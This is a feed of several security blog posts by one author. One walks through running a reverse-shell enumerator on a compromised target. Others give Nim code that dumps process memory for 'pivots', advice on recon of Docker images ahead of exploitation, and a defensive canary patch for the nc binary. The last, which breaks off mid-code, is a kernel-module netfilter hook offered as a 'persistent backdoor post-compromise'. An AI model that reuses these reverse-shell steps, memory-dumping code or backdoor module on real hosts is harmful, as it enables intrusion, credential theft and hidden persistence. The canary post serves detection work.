Forem: fx2301 The latest articles on Forem by fx2301 (@fx2301). https://forem.com/fx2301 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F793920%2F253be76c-30e2-4040-8533-a30f2074c216.png Forem: fx2301 https://forem.com/fx2301 en Reverse Shell Enumeration fx2301 Mon, 21 Aug 2023 00:29:53 +0000 https://forem.com/fx2301/reverse-shell-enumeration-53n8 https://forem.com/fx2301/reverse-shell-enumeration-53n8 <h2> Why? </h2> <p>You're a defender wanting to audit to see which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.</p> <h2> When? </h2> <p>You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.</p> <h2> How? </h2> <ol> <li>Clone the repo: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>git clone https://github.com/fx2301/reverseshellenum.git <span class="nb">cd </span>reverseshellenum </code></pre> </div> <ol> <li>Generate yourself a fresh script: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">LHOST</span><span class="o">=</span><span class="s2">"10.10.0.123"</span> <span class="nv">LPORT</span><span class="o">=</span>31373 python3 generate.py </code></pre> </div> <ol> <li>Run the listener: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>./listen.sh </code></pre> </div> <ol> <li>Run the reverse shell enumerator on the target host: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>./reverseshellenum.sh </code></pre> </div> <ol> <li>Observe which shells work (refer to shells.json): </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./listen.sh <span class="o">[</span>i] Starting Reverse Shell Audit <span class="o">[</span>+] Success: Bash <span class="nt">-i</span> <span class="o">[</span>+] Success: Bash 196 <span class="o">[</span>+] Success: Bash <span class="nb">read </span>line <span class="o">[</span>+] Success: Bash 5 <span class="o">[</span>+] Success: ncat <span class="nt">-e</span> <span class="o">[</span>+] Success: Perl <span class="o">[</span>+] Success: Perl no sh <span class="o">[</span>+] Success: PHP Emoji <span class="o">[</span>i] Ending Reverse Shell Audit </code></pre> </div> <p>PR's welcome! Kudos to <a href="https://www.revshells.com">revshells.com</a> for the raw material.</p> redteam blueteam reverseshell enumeration Docker image recon fx2301 Thu, 02 Mar 2023 19:55:53 +0000 https://forem.com/fx2301/docker-image-recon-2cle https://forem.com/fx2301/docker-image-recon-2cle <h2> Why? </h2> <p>You want to find weaknesses to exploit in an third party docker image.</p> <h2> When? </h2> <p>You have access to a target docker image ahead of exploitation.</p> <h2> How? </h2> <h3> Be wary of your local docker setup </h3> <p>Assuming you already have the docker image locally you want to be able to passively inspect it first. This is because default docker installations are not inherently secure. There's lots of good documentation on this from Docker themselves (see <a href="https://docs.docker.com/engine/security/">Docker Security</a>, especially <a href="https://docs.docker.com/engine/security/rootless/">Rootless mode</a>). If in doubt it always pays to see what precautions a forensics or incident response team would take with an untrusted docker image (google is your friend here).</p> <h3> Passively inspect layers </h3> <p>A good starting point is inspecting layers. Software engineers optimize their build processes around the semantic and performance benefits of docker layers, so the layer that changes the most will likely be the last, smallest, and the most juicy (i.e. configuration and code that's specific to the third party). Even better, is that likely the second to last layer will be a neat presentation of the code's third-party dependencies. You can inspect the layers with an open source tool, called <a href="https://github.com/wagoodman/dive">dive</a>. If you have a more command-line friendly way you do this, please comment below. I'd love to hear about it.</p> <p>This is as straight-forward as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>dive IMAGE </code></pre> </div> <p>Once you find something juicy you can selectively extract files from the container like so:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">export </span><span class="nv">ID</span><span class="o">=</span><span class="si">$(</span>docker create IMAGE<span class="si">)</span> docker <span class="nb">cp</span> <span class="nv">$ID</span>:/PATH_WITHIN_IMAGE LOCAL_PATH </code></pre> </div> <h3> Run within the image </h3> <p>If it's worth risking running the image locally there are things you can do to limit your exposure. The first is you don't actively want to undo the security benefits docker does provide you. Your image may be expecting to run with <code>--cap-add=SYS_ADMIN</code> but that doesn't mean you should! Here's an example of parameters that directly increase the risk of container escape: <a href="https://cloud.redhat.com/blog/docker-forensics-for-containers-how-to-conduct-investigations#container-escape">container escapes</a>.</p> <h4> Override the entrypoint </h4> <p>You'll want to override the default behavior of the image. A Dockerfile like this that overrides the <code>ENTRYPOINT</code> may get you going in the right direction (assuming that you are heading in the direction of adding your own <code>COPY</code> directives to launch your own code):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>FROM &lt;IMAGE&gt; EXPOSE 8080/tcp ENTRYPOINT ["python3", "-m", "http.server"] CMD ["8080"] </code></pre> </div> <h4> Lock down egress to the internet </h4> <p>Before you run this, you may want to lock down egress in case the image calls home in some way. I didn't find a very satisfactory answer for this without going the route of opaque plugins to handle the task for you. Cribbing from the <a href="https://docs.docker.com/network/bridge/">docker network documentation</a>, we can at least create our own internal network bridge (i.e. with no egress gateway to the internet at large). This isn't ideal as it's still exposing your host:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker network create <span class="nt">--internal</span> egress-restricted-net </code></pre> </div> <p>From here we specify <code>--network egress-restricted-net</code> when running our image as a container. You can verify this behavior for yourself with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>FROM ubuntu:latest RUN apt update &amp;&amp; apt install -y iputils-ping iproute2 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">--network</span> egress-restricted-net <span class="nt">--rm</span> <span class="nt">-it</span> <span class="se">\</span> <span class="si">$(</span>docker build <span class="nt">-q</span> <span class="nt">-f</span> Dockerfile.egresstest .<span class="si">)</span> /bin/bash <span class="nt">-i</span> </code></pre> </div> <h4> Remove networking entirely </h4> <p>Alternatively, if you can turn off networking entirely with <code>--network none</code> if you're willing to control the container entirely via stdin/stdout and <code>docker run -it</code>.</p> redteam docker recon Capturing process memory from /proc/pid/mem fx2301 Fri, 09 Dec 2022 02:15:46 +0000 https://forem.com/fx2301/capturing-process-memory-from-procpidmem-1hpc https://forem.com/fx2301/capturing-process-memory-from-procpidmem-1hpc <h1> Why? </h1> <p>You want to inspect process memory to enable further pivots within an environment.</p> <h1> When? </h1> <p>You have root access to a Linux host, and no Linux Security Modules block access to /proc.</p> <h1> How? </h1> <p>A statically linked binary is especially convenient here - as is learning from how others have solve the problem (e.g. from <a href="https://github.com/BishopFox/sliver/blob/b86e49d341ea1653b96a6ccea0727527220e9c3c/implant/sliver/procdump/dump_linux.go#L128-L129">Sliver's Dump Process Memory command</a>).</p> <p>This nim code reads metadata from /proc/pid/maps, and dumps to stdout offsets of /proc/pid/mem that are: readable, non executable, and non-file-backed. My experience mirrored the Sliver developer's in that <code>[vvar]</code> and <code>[vdso]</code> errored out when attempting to read them:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight nim"><code><span class="k">import</span> <span class="n">std</span><span class="o">/</span><span class="n">os</span> <span class="k">import</span> <span class="n">std</span><span class="o">/</span><span class="n">strutils</span> <span class="k">import</span> <span class="n">std</span><span class="o">/</span><span class="n">strformat</span> <span class="k">if</span> <span class="n">paramCount</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">:</span> <span class="n">echo</span> <span class="o">&amp;</span><span class="s">"Usage: {paramStr(0)} &lt;pid&gt;"</span> <span class="n">quit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">let</span> <span class="n">f</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="o">&amp;</span><span class="s">"/proc/{paramStr(1)}/mem"</span><span class="p">)</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">lines</span><span class="p">(</span><span class="o">&amp;</span><span class="s">"/proc/{paramStr(1)}/maps"</span><span class="p">):</span> <span class="k">let</span> <span class="n">parts</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">" "</span><span class="p">)</span> <span class="c"># readable memory but not executable code</span> <span class="k">if</span> <span class="n">parts</span><span class="o">[</span><span class="mi">1</span><span class="o">][</span><span class="mi">0</span><span class="o">]</span> <span class="o">==</span> <span class="sc">'r'</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">parts</span><span class="o">[</span><span class="mi">1</span><span class="o">]</span><span class="p">.</span><span class="n">contains</span><span class="p">(</span><span class="sc">'x'</span><span class="p">):</span> <span class="c"># skip files mapped into memory</span> <span class="k">if</span> <span class="n">parts</span><span class="o">[</span><span class="mi">3</span><span class="o">]</span> <span class="o">==</span> <span class="s">"00:00"</span><span class="p">:</span> <span class="c"># skip memory we will error out accessing</span> <span class="k">if</span> <span class="ow">not</span><span class="p">(</span><span class="n">line</span><span class="p">.</span><span class="n">endsWith</span><span class="p">(</span><span class="s">"[vvar]"</span><span class="p">)</span> <span class="ow">or</span> <span class="n">line</span><span class="p">.</span><span class="n">endsWith</span><span class="p">(</span><span class="s">"[vdso]"</span><span class="p">)):</span> <span class="k">let</span> <span class="n">addresses</span> <span class="o">=</span> <span class="n">parts</span><span class="o">[</span><span class="mi">0</span><span class="o">]</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"-"</span><span class="p">)</span> <span class="k">let</span> <span class="n">offset_start</span> <span class="o">=</span> <span class="n">addresses</span><span class="o">[</span><span class="mi">0</span><span class="o">]</span><span class="p">.</span><span class="n">parseHexInt</span><span class="p">()</span> <span class="k">let</span> <span class="n">offset_end</span> <span class="o">=</span> <span class="n">addresses</span><span class="o">[</span><span class="mi">1</span><span class="o">]</span><span class="p">.</span><span class="n">parseHexInt</span><span class="p">()</span> <span class="n">f</span><span class="p">.</span><span class="n">setFilePos</span><span class="p">(</span><span class="n">offset_start</span><span class="p">)</span> <span class="k">var</span> <span class="n">buffer</span><span class="p">:</span> <span class="kt">array</span><span class="o">[</span><span class="mi">1024</span><span class="p">,</span> <span class="kt">int8</span><span class="o">]</span> <span class="k">var</span> <span class="n">remaining</span> <span class="o">=</span> <span class="n">offset_end</span><span class="o">-</span><span class="n">offset_start</span> <span class="k">while</span> <span class="n">remaining</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span> <span class="k">let</span> <span class="n">n</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">readBytes</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">min</span><span class="p">(</span><span class="n">remaining</span><span class="p">,</span> <span class="mi">1024</span><span class="p">))</span> <span class="n">remaining</span> <span class="o">-=</span> <span class="n">n</span> <span class="k">discard</span> <span class="n">stdout</span><span class="p">.</span><span class="n">writeBytes</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span> <span class="n">f</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> Linux ELF Binary Canary PoC fx2301 Sun, 04 Dec 2022 03:09:25 +0000 https://forem.com/fx2301/linux-elf-binary-canary-poc-ide https://forem.com/fx2301/linux-elf-binary-canary-poc-ide <h1> Why? </h1> <p>You want to know when your defenses have failed and an attacker is running commands in your environment.</p> <h1> When? </h1> <p>You are defending a Linux host which has egress to the internet. You can hook into provisioning infrastructure automation to instrument the host. Notification via canarytokens.org is sufficient. Binary patching is allowed (i.e. binary hash differences won't trigger other forms of alerting noise). You have identified high signal-to-noise commands to hook into (i.e. ones that you expect only a hacker to run, e.g. <code>nc</code>, <code>whoami</code>, or even <code>bash</code>).</p> <h1> How? </h1> <p>This PoC is not automated, and relies on patching entries to include our canary library by overwriting the .dynamic section DEBUG entry, so it relies on binaries already using dynamic libraries. </p> <p>Once we have patched a binary to load our canary library, all we need to do is ensure that our canary library exercises the canary token on startup.</p> <p>We're using a 64-bit <code>nc</code> binary for this example.</p> <h2> Inspecting ELF </h2> <p>First, we inspect our binary with <code>readelf</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ readelf -d `which nc` Dynamic section at offset 0x8ba8 contains 29 entries: Tag Type Name/Value 0x0000000000000001 (NEEDED) Shared library: [libbsd.so.0] ... 0x0000000000000015 (DEBUG) 0x0 ... </code></pre> </div> <p>There are three things of note here:</p> <ul> <li> <code>0x8ba8</code> is the start of the <code>.dynamic</code> section,</li> <li> <code>libbsd.so.0</code> is the first entry, and</li> <li>a <code>DEBUG</code> entry exists.</li> </ul> <h2> Patching ELF </h2> <p>The corresponding code from <code>elf.h</code> in Linux is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#define DT_NEEDED 1 #define DT_DEBUG 21 </span> <span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Elf64_Sxword</span> <span class="n">d_tag</span><span class="p">;</span> <span class="cm">/* entry tag value */</span> <span class="k">union</span> <span class="p">{</span> <span class="n">Elf64_Xword</span> <span class="n">d_val</span><span class="p">;</span> <span class="n">Elf64_Addr</span> <span class="n">d_ptr</span><span class="p">;</span> <span class="p">}</span> <span class="n">d_un</span><span class="p">;</span> <span class="p">}</span> <span class="n">Elf64_Dyn</span><span class="p">;</span> </code></pre> </div> <p>We want to find entries by their <code>d_tag</code>, override a <code>d_tag</code> of DEBUG (21, i.e 0x15) with NEEDED (1, i.e. 0x01), and provide a valid <code>d_ptr</code> value.</p> <p>We find both easily enough with <code>hexdump</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ hexdump -C `which nc` | grep -EA1 '^00008[bcde].. .* (01|15)' 00008ba0 70 4b 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |pK..............| 00008bb0 af 02 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................| 00008bc0 bb 02 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................| 00008bd0 ca 02 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 |................| -- 00008c80 18 00 00 00 00 00 00 00 15 00 00 00 00 00 00 00 |................| 00008c90 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 |................| </code></pre> </div> <p>Our first entry has a <code>d_tag</code> of <code>01 00 00 00 00 00 00 00</code> and a <code>d_ptr</code> of <code>af 02 00 00 00 00 00 00</code> (resolving to "libbsd.so.0").</p> <p>Our debug entry has a <code>d_tag</code> of <code>15 00 00 00 00 00 00 00</code> and <code>d_ptr</code> of <code>00 00 00 00 00 00 00 00</code>.</p> <p>We can patch our binary with this python code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">nc.patched</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb+</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">seek</span><span class="p">(</span><span class="mh">0x8ba8</span><span class="p">)</span> <span class="n">dt_needed_entry</span> <span class="o">=</span> <span class="nf">bytearray</span><span class="p">(</span><span class="n">f</span><span class="p">.</span><span class="nf">read</span><span class="p">(</span><span class="mh">0x10</span><span class="p">))</span> <span class="n">dt_needed_entry</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">dt_needed_entry</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span><span class="o">+</span><span class="mi">3</span> <span class="c1"># eliminate "lib" prefix </span> <span class="n">f</span><span class="p">.</span><span class="nf">seek</span><span class="p">(</span><span class="mh">0x8c88</span><span class="p">)</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">dt_needed_entry</span><span class="p">)</span> </code></pre> </div> <p>We copy nc with: <code>cp $(which nc) nc.patched</code>, and patch it with <code>python3 patch_nc.py</code>.</p> <p><code>ldd</code> will now show us that <code>nc.patched</code> loads <code>bsd.so.0</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ ldd nc.patched ...snip... bsd.so.0 =&gt; not found ...snip... </code></pre> </div> <p>So far so good!</p> <h2> Creating our canary shared library </h2> <p>Having create a "Web bug / URL token" at canarytokens.org, we embed a minimal HTTP GET in our shared library:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;arpa/inet.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;netdb.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;netinet/in.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;sys/socket.h&gt;</span><span class="cp"> </span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">canary_token_host</span> <span class="o">=</span> <span class="s">"canarytokens.com"</span><span class="p">;</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">canary_token</span> <span class="o">=</span> <span class="s">"YOUR_TOKEN"</span><span class="p">;</span> <span class="kt">void</span> <span class="nf">init</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">sock</span><span class="p">;</span> <span class="k">if</span><span class="p">((</span><span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="n">IPPROTO_TCP</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">target</span><span class="p">;</span> <span class="n">target</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span> <span class="k">struct</span> <span class="n">hostent</span> <span class="o">*</span><span class="n">h</span> <span class="o">=</span> <span class="n">gethostbyname</span><span class="p">(</span><span class="n">canary_token_host</span><span class="p">);</span> <span class="kt">char</span> <span class="o">*</span><span class="n">target_ip</span> <span class="o">=</span> <span class="n">inet_ntoa</span><span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="k">struct</span> <span class="n">in_addr</span> <span class="o">*</span><span class="p">)</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">h_addr</span><span class="p">));</span> <span class="k">if</span> <span class="p">(</span><span class="n">inet_pton</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">target_ip</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="o">&amp;</span><span class="p">(</span><span class="n">target</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span><span class="p">)))</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="n">target</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="mi">80</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">target</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="kt">char</span> <span class="n">payload</span><span class="p">[</span><span class="mi">300</span><span class="p">];</span> <span class="n">sprintf</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="s">"GET /tags/articles/%s/index.html HTTP/1.1</span><span class="se">\r\n</span><span class="s">Host: %s</span><span class="se">\r\n</span><span class="s">User-Agent: %s</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">,</span> <span class="n">canary_token</span><span class="p">,</span> <span class="n">canary_token_host</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">send</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">100</span><span class="p">];</span> <span class="n">read</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">100</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">sock</span><span class="p">);</span> <span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">".init_array"</span><span class="p">)))</span> <span class="n">typeof</span><span class="p">(</span><span class="n">init</span><span class="p">)</span> <span class="o">*</span><span class="n">__init</span> <span class="o">=</span> <span class="n">init</span><span class="p">;</span> </code></pre> </div> <p>We verify it works correctly with a manual <code>LD_PRELOAD</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ gcc -shared -fPIC canary.c -o canary.so $ LD_PRELOAD=`pwd`/canary.so ls ...snip... $ curl -s 'http://canarytokens.org/download?fmt=incidentlist_json&amp;token=YOUR_TOKEN&amp;auth=YOUR_AUTH' | jq '.[].useragent' | tail -n 1 "ls" </code></pre> </div> <p>Excellent! (The above URL is the Export link on the Manage Your Token page)</p> <h2> Wiring it all together for the PoC </h2> <p>We put our <code>canary.so</code> in place under <code>bsd.so.0</code> and fire up <code>nc.patched</code>!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ sudo cp canary.so /lib/x86_64-linux-gnu/bsd.so.0 $ ./nc.patched -h ...snip... $ curl -s 'http://canarytokens.org/download?fmt=incidentlist_json&amp;token=YOUR_TOKEN&amp;auth=YOUR_AUTH' | jq '.[].useragent' | tail -n 1 "nc.patched" </code></pre> </div> <p>Success!</p> productivity career learning Kernel module HTTP request sniffing fx2301 Fri, 02 Dec 2022 07:04:14 +0000 https://forem.com/fx2301/kernel-module-http-request-sniffing-43f0 https://forem.com/fx2301/kernel-module-http-request-sniffing-43f0 <h1> Why? </h1> <p>You want to leave a persistent backdoor post-compromise.</p> <h1> When? </h1> <p>You've root level access to a Linux host that allows kernel module installation (or you can add to a Docker layer), and you can induce HTTP requests to be sent to that host.</p> <h1> How? </h1> <p>Build a kernel module for yourself that uses a netfilter hook to interrogate incoming TCP packets for your desired trigger condition. Documentation, however, is practically non-existent. To quote libnfnetlink: "Where can I find documentation? At the moment, you will have to RTFS."</p> <p>This example looks for an HTTP command with a magic prefix. It has no post-trigger behavior defined:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include</span> <span class="cpf">&lt;linux/init.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/module.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/netfilter.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/netfilter_ipv4.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/ip.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/tcp.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;net/ip.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;linux/string.h&gt;</span><span class="cp"> </span> <span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"MIT"</span><span class="p">);</span> <span class="n">MODULE_AUTHOR</span><span class="p">(</span><span class="s">"Anon"</span><span class="p">);</span> <span class="k">static</span> <span class="k">struct</span> <span class="n">nf_hook_ops</span> <span class="o">*</span><span class="n">nfho</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">magic_prefix</span> <span class="o">=</span> <span class="s">"GET /abracadabra/"</span><span class="p">;</span> <span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">hfunc</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">priv</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nf_hook_state</span> <span class="o">*</span><span class="n">state</span><span class="p">)</span> <span class="p">{</span> <span class="k">struct</span> <span class="n">iphdr</span> <span class="o">*</span><span class="n">iph</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">;</span> <span class="k">struct</span> <span class="n">tcphdr</span> <span class="n">buffer</span><span class="p">,</span> <span class="o">*</span><span class="n">hdr</span><span class="p">;</span> <span class="kt">int</span> <span class="n">payload_len</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buffer2</span><span class="p">[</span><span class="mi">160</span><span class="p">];</span> <span class="kt">char</span> <span class="o">*</span><span class="n">payload</span><span class="p">;</span> <span class="kt">int</span> <span class="n">dest_port</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span><span class="n">http_command</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">skb</span><span class="p">)</span> <span class="k">return</span> <span class="n">NF_ACCEPT</span><span class="p">;</span> <span class="n">iph</span> <span class="o">=</span> <span class="n">ip_hdr</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">iph</span><span class="o">-&gt;</span><span class="n">protocol</span> <span class="o">==</span> <span class="n">IPPROTO_TCP</span><span class="p">)</span> <span class="p">{</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">skb_network_offset</span><span class="p">(</span><span class="n">skb</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">iph</span><span class="o">-&gt;</span><span class="n">ihl</span> <span class="o">&lt;&lt;</span> <span class="mi">2</span><span class="p">);</span> <span class="n">hdr</span> <span class="o">=</span> <span class="n">skb_header_pointer</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">buffer</span><span class="p">);</span> <span class="n">offset</span> <span class="o">+=</span> <span class="n">hdr</span><span class="o">-&gt;</span><span class="n">doff</span> <span class="o">&lt;&lt;</span> <span class="mi">2</span><span class="p">;</span> <span class="n">payload_len</span> <span class="o">=</span> <span class="n">skb</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">-</span> <span class="n">offset</span><span class="p">;</span> <span class="n">dest_port</span> <span class="o">=</span> <span class="n">be16_to_cpu</span><span class="p">(</span><span class="n">hdr</span><span class="o">-&gt;</span><span class="n">dest</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">dest_port</span> <span class="o">==</span> <span class="mi">8000</span> <span class="o">&amp;&amp;</span> <span class="n">payload_len</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">skb_header_pointer</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">min</span><span class="p">(</span><span class="mi">160</span><span class="p">,</span><span class="n">payload_len</span><span class="p">),</span> <span class="n">buffer2</span><span class="p">);</span> <span class="n">http_command</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">(</span><span class="o">&amp;</span><span class="n">payload</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">http_command</span><span class="p">,</span> <span class="n">magic_prefix</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">magic_prefix</span><span class="p">))</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">printk</span><span class="p">(</span><span class="n">KERN_ALERT</span> <span class="s">"payload matches! %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">http_command</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">printk</span><span class="p">(</span><span class="n">KERN_ALERT</span> <span class="s">"payload does not match: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">http_command</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="n">NF_ACCEPT</span><span class="p">;</span> <span class="p">}</span> <span class="k">static</span> <span class="kt">int</span> <span class="n">__init</span> <span class="nf">LKM_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> <span class="n">nfho</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nf_hook_ops</span><span class="o">*</span><span class="p">)</span><span class="n">kcalloc</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span 